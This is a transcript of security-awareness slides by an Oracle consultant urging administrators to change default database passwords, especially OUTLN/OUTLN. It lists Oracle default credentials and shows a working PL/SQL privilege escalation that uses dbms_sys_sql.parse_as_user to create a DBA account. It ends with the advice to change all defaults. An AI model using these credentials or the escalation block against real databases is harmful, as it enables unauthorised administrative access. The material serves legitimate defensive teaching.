db_writer_processes on NT. - Go
Download
Report
Transcript db_writer_processes on NT. - Go
Remember to change the OUTLN
password
Urs Messerli
Messerli Datenbanktechnik Gmbh
www.datenbanktechnik.ch
Default passwords
• sys/change_on_install
• system/manager
• outln/outln
Log on as OUTLN
SQL> show user
USER is "OUTLN"
SQL> select * from all_users where
username = 'HACKY';
no rows selected
OUTLN has lots of privileges
SQL> select * FROM
SESSION_PRIVS;
CREATE DATABASE LINK
CREATE PROCEDURE
PRIVILEGE
---------------------------------------CREATE SESSION
ALTER SESSION
UNLIMITED TABLESPACE
CREATE TABLE
CREATE CLUSTER
CREATE SYNONYM
CREATE VIEW
CREATE SEQUENCE
EXECUTE ANY PROCEDURE
CREATE TRIGGER
CREATE TYPE
CREATE OPERATOR
CREATE INDEXTYPE
15 rows selected.
So create a user with DBA
privilege
DECLARE
mycur INTEGER;
BEGIN
mycur := sys.dbms_sys_sql.open_cursor;
sys.dbms_sys_sql.parse_as_user(mycur,
'create user hacky identified by macho',dbms_sql.native, 0);
sys.dbms_sys_sql.parse_as_user(mycur,
'grant dba to hacky',dbms_sql.native,0);
sys.dbms_sys_sql.close_cursor(mycur);
END;
/
PL/SQL procedure successfully completed.
So I did create the user, but I
don’t have the privileges myself
SQL> DROP USER HACKY;
DROP USER HACKY
*
ERROR at line 1:
ORA-01031: insufficient privileges
The keys to the kingdom
• I have created a new user with DBA
privilege
• I have executed code as the DBA
• I could do anything!
• Worried?
The Moral of this story is…
• Change all the default passwords
• Including OUTLN/OUTLN
Remember to change the OUTLN
password
Urs Messerli
Messerli Datenbanktechnik Gmbh
www.datenbanktechnik.ch